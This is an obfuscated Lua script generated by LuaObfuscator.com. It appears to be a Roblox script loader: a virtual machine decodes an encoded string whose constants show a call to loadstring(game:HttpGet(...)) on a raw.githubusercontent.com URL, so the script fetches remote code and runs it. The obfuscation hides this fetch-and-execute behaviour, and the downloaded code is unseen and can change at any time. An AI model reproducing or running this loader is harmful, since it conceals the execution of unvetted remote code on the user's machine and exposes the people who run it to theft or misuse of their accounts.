--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.9) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function() return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...) local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30) if (v1(v30,2)==81) then v19=v0(v3(v30,1,1));return "";else local v81=v2(v0(v30,16));if v19 then local v91=v5(v81,v19);v19=nil;return v91;else return v81;end end end);local function v20(v31,v32,v33) if v33 then local v82=0 -0 ;local v83;while true do if (v82==(0 -0)) then v83=(v31/(2^(v32-((878 -(282 + 595)) -0))))%((1639 -(1523 + 114))^(((v33-(2 -1)) -(v32-(620 -(555 + 64)))) + (932 -(857 + 74)))) ;return v83-(v83%(569 -(367 + 201))) ;end end else local v84=(929 -(214 + 641 + 72))^(v32-(1 + 0)) ;return (((v31%(v84 + v84))>=v84) and 1) or (0 + 0) ;end end local function v21() local v34=(0 + 0) -0 ;local v35;while true do if (v34==(1065 -(68 + 997))) then v35=v1(v16,v18,v18);v18=v18 + (1271 -(226 + 1044)) ;v34=4 -(1 + 2) ;end if (v34==(118 -(32 + 85))) then return v35;end end end local function v22() local v36,v37=v1(v16,v18,v18 + 2 );v18=v18 + (959 -(892 + 65)) ;return (v37 * (610 -354)) + v36 ;end local function v23() local v38,v39,v40,v41=v1(v16,v18,v18 + 3 );v18=v18 + (6 -2) ;return (v41 * (30800116 -14022900)) + (v40 * (65886 -(87 + 193 + 70))) + (v39 * (436 -(67 + 113))) + v38 ;end local function v24() local v42=v23();local v43=v23();local v44=2 -1 ;local v45=(v20(v43,1,20) * (((20 -(10 + 8)) + 0)^32)) + v42 ;local v46=v20(v43,83 -62 ,(3781 -2798) -(802 + 150) );local v47=((v20(v43,85 -53 )==(1 -0)) and  -(1 + 0)) or (998 -(915 + 82)) ;if (v46==(0 -0)) then if (v45==(0 + 0)) then return v47 * (0 -0) ;else local v92=1187 -(1069 + 118) ;while true do if (v92==(0 -0)) then v46=1 -0 ;v44=0;break;end end end elseif (v46==(356 + 1691)) then return ((v45==(0 -0)) and (v47 * (((443 -(416 + 26)) + 0)/(791 -(368 + 423))))) or (v47 * NaN) ;end return v8(v47,v46-((10261 -7047) -2191) ) * (v44 + (v45/(2^52))) ;end local function v25(v48) local v49;if  not v48 then local v85=0 + 0 ;while true do if (v85==(430 -(44 + 386))) then v48=v23();if (v48==((772 -(201 + 571)) -0)) then return "";end break;end end end v49=v3(v16,v18,(v18 + v48) -(439 -(145 + 293)) );v18=v18 + v48 ;local v50={};for v65=1 + 0 , #v49 do v50[v65]=v2(v1(v3(v49,v65,v65)));end return v6(v50);end local v26=v23;local function v27(...) return {...},v12("#",...);end local function v28() local v51=(function() return 0;end)();local v52=(function() return;end)();local v53=(function() return;end)();local v54=(function() return;end)();local v55=(function() return;end)();local v56=(function() return;end)();local v57=(function() return;end)();local v58=(function() return;end)();while true do if (v51~=(0 -0)) then else local v88=(function() return 0 -0 ;end)();while true do if (v88==(2 + 0)) then v51=(function() return 1;end)();break;end if (v88~=(651 -(494 + 157))) then else local v103=(function() return 0;end)();while true do if (v103~=(1 -0)) then else v88=(function() return 1;end)();break;end if (v103==(0 + 0)) then v52=(function() return function(v114,v115,v116) local v117=(function() return 0 + 0 ;end)();local v118=(function() return;end)();while true do if (v117~=(0 + 0)) then else v118=(function() return 836 -(660 + 176) ;end)();while true do if (v118~=0) then else v114[v115-#"!" ]=(function() return v116();end)();return v114,v115,v116;end end break;end end end;end)();v53=(function() return {};end)();v103=(function() return 1;end)();end end end if (1==v88) then local v104=(function() return 0;end)();while true do if (v104==(0 + 0)) then v54=(function() return {};end)();v55=(function() return {};end)();v104=(function() return 203 -(14 + 188) ;end)();end if (v104==1) then v88=(function() return 677 -(534 + 141) ;end)();break;end end end end end if (v51==2) then v56[ #"91("]=(function() return v21();end)();for v93= #",",v23() do local v94=(function() return 0;end)();local v95=(function() return;end)();while true do if (v94~=(0 + 0)) then else v95=(function() return v21();end)();if (v20(v95, #"[", #"<")~=0) then else local v110=(function() return 0 + 0 ;end)();local v111=(function() return;end)();local v112=(function() return;end)();local v113=(function() return;end)();while true do if (v110==2) then if (v20(v112, #",", #"|")~= #"\\") then else v113[2 + 0 ]=(function() return v58[v113[2]];end)();end if (v20(v112,2,3 -1 )~= #"\\") then else v113[ #"asd"]=(function() return v58[v113[ #"xxx"]];end)();end v110=(function() return 3;end)();end if (v110~=(1 -0)) then else local v119=(function() return 0;end)();local v120=(function() return;end)();while true do if ((0 -0)==v119) then v120=(function() return 0 + 0 ;end)();while true do if ((0 + 0)~=v120) then else local v171=(function() return 0;end)();while true do if (v171~=(396 -(115 + 281))) then else v113=(function() return {v22(),v22(),nil,nil};end)();if (v111==0) then local v173=(function() return 0 + 0 ;end)();while true do if (v173~=0) then else v113[ #"19("]=(function() return v22();end)();v113[ #".dev"]=(function() return v22();end)();break;end end elseif (v111== #",") then v113[ #"-19"]=(function() return v23();end)();elseif (v111==(4 -2)) then v113[ #"91("]=(function() return v23() -(2^(58 -42)) ;end)();elseif (v111~= #"gha") then else local v178=(function() return 0;end)();while true do if (v178==(867 -(550 + 317))) then v113[ #"91("]=(function() return v23() -((2 -0)^(22 -6)) ;end)();v113[ #"asd1"]=(function() return v22();end)();break;end end end v171=(function() return 1;end)();end if (v171~=(2 -1)) then else v120=(function() return 286 -(134 + 151) ;end)();break;end end end if ((1666 -(970 + 695))~=v120) then else v110=(function() return 3 -1 ;end)();break;end end break;end end end if (v110==0) then local v121=(function() return 0;end)();local v122=(function() return;end)();while true do if (v121==(1990 -(582 + 1408))) then v122=(function() return 0 -0 ;end)();while true do if (v122~=(0 -0)) then else local v172=(function() return 0;end)();while true do if (v172~=(3 -2)) then else v122=(function() return 1825 -(1195 + 629) ;end)();break;end if (v172~=(0 -0)) then else v111=(function() return v20(v95,2, #"asd");end)();v112=(function() return v20(v95, #"0313",6);end)();v172=(function() return 242 -(187 + 54) ;end)();end end end if ((781 -(162 + 618))==v122) then v110=(function() return 1 + 0 ;end)();break;end end break;end end end if (v110==3) then if (v20(v112, #"asd", #"-19")~= #"~") then else v113[ #".com"]=(function() return v58[v113[ #".dev"]];end)();end v53[v93]=(function() return v113;end)();break;end end end break;end end end for v96= #"!",v23() do v54,v96,v28=(function() return v52(v54,v96,v28);end)();end return v56;end if (v51~=1) then else local v90=(function() return 0;end)();while true do if (v90==(2 + 0)) then v51=(function() return 2;end)();break;end if (1~=v90) then else v58=(function() return {};end)();for v105= #"}",v57 do local v106=(function() return 0 -0 ;end)();local v107=(function() return;end)();local v108=(function() return;end)();local v109=(function() return;end)();while true do if (v106~=1) then else v109=(function() return nil;end)();while true do if (v107~=(0 -0)) then else local v124=(function() return 0;end)();while true do if (v124~=(0 + 0)) then else v108=(function() return v21();end)();v109=(function() return nil;end)();v124=(function() return 1;end)();end if (v124~=1) then else v107=(function() return 1637 -(1373 + 263) ;end)();break;end end end if (1==v107) then if (v108== #">") then v109=(function() return v21()~=(1000 -(451 + 549)) ;end)();elseif (v108==2) then v109=(function() return v24();end)();elseif (v108~= #"19(") then else v109=(function() return v25();end)();end v58[v105]=(function() return v109;end)();break;end end break;end if (v106~=(0 + 0)) then else v107=(function() return 0;end)();v108=(function() return nil;end)();v106=(function() return 1 -0 ;end)();end end end v90=(function() return 2;end)();end if ((0 -0)==v90) then v56=(function() return {v53,v54,nil,v55};end)();v57=(function() return v23();end)();v90=(function() return 1 + 0 ;end)();end end end end end local function v29(v59,v60,v61) local v62=v59[1 -0 ];local v63=v59[343 -((971 -(239 + 514)) + 123) ];local v64=v59[(38 + 68) -(17 + (1415 -(797 + 532))) ];return function(...) local v67=v62;local v68=v63;local v69=v64;local v70=v27;local v71=1582 -(1535 + 46) ;local v72= -(1 -0);local v73={};local v74={...};local v75=v12("#",...) -(1 + 0 + 0) ;local v76={};local v77={};for v86=0 -0 ,v75 do if ((3242>=567) and (v86>=v69)) then v73[v86-v69 ]=v74[v86 + ((2 + 1) -2) ];else v77[v86]=v74[v86 + 1 ];end end local v78=(v75-v69) + 1 + 0 ;local v79;local v80;while true do local v87=560 -(306 + 254) ;while true do if ((((2 -1) + 0)==v87) or (847>=1263)) then if ((v80<=((1215 -(373 + 829)) -6)) or (2253==1851)) then if (v80<=(68 -(30 + 35))) then if (v80<=(1 -0)) then if (v80==0) then do return;end else v77[v79[1469 -(899 + 568) ]]();end elseif ((v80>(2 + 0)) or (2087>2372)) then v77[v79[4 -2 ]]={};else v77[v79[5 -3 ]]();end elseif (v80<=(608 -(268 + 335))) then if (v80>(294 -(60 + 230))) then v77[v79[1 + 1 ]]=v61[v79[3]];else v77[v79[2]]={};end elseif ((v80>(578 -(426 + 146))) or (4445<4149)) then local v130=v79[1 + (732 -(476 + 255)) ];local v131,v132=v70(v77[v130](v13(v77,v130 + (1457 -(282 + 1174)) ,v79[814 -(569 + 242) ])));v72=(v132 + v130) -(2 -1) ;local v133=0 + 0 ;for v159=v130,v72 do v133=v133 + (1025 -((1836 -(369 + 761)) + 184 + 134)) ;v77[v159]=v131[v133];end else v77[v79[1253 -(721 + 530) ]]=v79[3];end elseif (v80<=(1282 -(945 + 326))) then if (v80<=(22 -13)) then if (v80>(746 -(542 + 196))) then v77[v79[(2 -0) + 0 ]]=v61[v79[703 -(271 + 429) ]];else local v138=v79[2 + (0 -0) ];local v139,v140=v70(v77[v138](v13(v77,v138 + (1501 -(1408 + 92)) ,v79[1089 -(461 + 625) ])));v72=(v140 + v138) -(1289 -(993 + 295)) ;local v141=0 + 0 ;for v162=v138,v72 do v141=v141 + 1 ;v77[v162]=v139[v141];end end elseif (v80==(1181 -(418 + 753))) then local v142=v79[1553 -(1126 + 425) ];v77[v142]=v77[v142](v13(v77,v142 + (239 -(64 + 174)) + 0 + 0 ,v72));else do return;end end elseif ((v80<=(2 + 11)) or (1818==85)) then if (v80==(1133 -(118 + 1003))) then v77[v79[1 + 1 ]]=v79[1 + 2 ];else local v146=529 -(406 + (181 -58)) ;local v147;local v148;while true do if (v146==(337 -(144 + 192))) then v77[v147 + (4 -3) ]=v148;v77[v147]=v148[v79[1773 -(1749 + 20) ]];break;end if (v146==(0 + (216 -(42 + 174)))) then v147=v79[1324 -(939 + 310 + 73) ];v148=v77[v79[2 + 1 ]];v146=1146 -(466 + 679) ;end end end elseif (v80==(13 + 1)) then local v149=v79[4 -2 ];v77[v149]=v77[v149](v13(v77,v149 + 1 + 0 + 0 ,v72));else local v151=v79[5 -3 ];local v152=v77[v79[2 + 1 + 0 ]];v77[v151 + (1901 -(106 + 1794)) ]=v152;v77[v151]=v152[v79[2 + 2 ]];end v71=v71 + 1 + 0 ;break;end if ((630<2127) and ((0 -0)==v87)) then v79=v67[v71];v80=v79[2 -1 ];v87=115 -((1508 -(363 + 1141)) + 110) ;end end end end;end return v29(v28(),{},v17)(...);end return v15("LOL!043Q00030A3Q006C6F6164737472696E6703043Q0067616D6503073Q00482Q747047657403473Q00682Q7470733A2Q2F7261772E67697468756275736572636F6E74656E742E636F6D2F7A79722Q6F692F46722Q652F726566732F68656164732F6D61696E2F436F6E666967746F6800094Q00037Q001209000100013Q001209000200023Q00200F00020002000300120C000400044Q0007000200044Q000E00013Q00022Q00010001000100016Q00017Q00",v9(),...);